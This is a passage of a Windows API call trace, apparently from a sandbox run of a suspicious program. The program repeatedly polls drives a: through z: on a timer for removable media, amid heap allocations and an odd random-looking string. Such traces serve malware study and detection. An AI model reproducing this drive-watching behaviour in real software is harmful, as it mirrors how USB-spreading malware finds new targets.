lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0219.278] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.278] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.278] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0219.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0219.278] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0219.278] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.278] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0219.279] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.279] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0219.279] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.279] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.279] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.279] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.279] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.280] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.280] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.280] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.280] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.280] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.281] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.281] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.281] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.281] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.281] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.282] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.282] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.282] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.282] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.282] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.283] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.283] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.283] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.283] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.283] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.284] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.284] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.284] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0219.284] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0219.284] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.285] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e00 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e00 | out: hHeap=0x12c0000) returned 1 [0219.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0219.285] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0219.285] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.285] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0219.286] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.286] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.286] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0219.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0219.286] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.286] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0219.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.286] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.286] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.287] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0219.287] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.287] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.287] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.287] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.495] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.495] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.496] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.496] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.496] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.496] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.496] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.496] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.497] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.497] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.497] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.497] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.498] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.498] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.498] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.498] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.498] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.499] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.499] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.499] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.499] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.499] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.499] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.500] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0219.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.500] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.500] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.500] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.500] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.500] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.501] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0219.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0219.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.501] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0219.502] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0219.502] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.502] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.502] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0219.502] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0219.503] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.503] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.503] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.503] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.503] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.503] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.503] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.504] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.504] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.504] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.504] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.504] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.504] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.505] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.505] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.505] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.505] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.506] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.506] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.506] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.507] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.507] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.507] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.507] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.507] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.508] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.508] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.508] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.508] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.508] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.508] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.509] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.509] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0219.509] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.509] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 